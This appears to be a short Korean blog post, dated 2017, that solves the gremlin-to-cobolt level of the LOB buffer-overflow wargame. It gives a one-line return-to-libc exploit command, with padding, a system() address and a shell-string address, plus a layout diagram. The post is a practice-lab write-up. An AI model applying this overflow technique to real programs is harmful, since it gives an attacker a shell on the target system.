머리정리하는곳
Profile

머리정리하는곳

c2w2m2

[Level2]gremlin -> cobolt

Pwnable/LOB · c2w2m2 · 2017. 5. 2. 21:21

먼저 cobolt.c 코드를 봅시다


뭐야... 저번문제에서 buffer 크기만 달라졌습니다. 

똑같은 RTL 방식으로 풀고 system 함수 주소, shell 주소 찾는 부분은 생략하겠습니다.


 ./cobolt `python -c 'print "A"*16 + "ABCD" + "\xe0\x8a\x05\x40" + "ABCD"+"\xf9\xbf\x0f\x40"'`

[buffer]                       [sfp]               [system]                            [dummy]                [shellcode]
 




클리어

'Pwnable > LOB' 카테고리의 다른 글

[Level5] orc -> wolfman  (0) 2017.05.17
[Level4] goblin -> orc  (0) 2017.05.17
클리어!  (0) 2017.05.17
[Level3]cobolt -> goblin  (2) 2017.05.02
[Level1] gate -> gremlin  (0) 2017.05.02
Close

티스토리툴바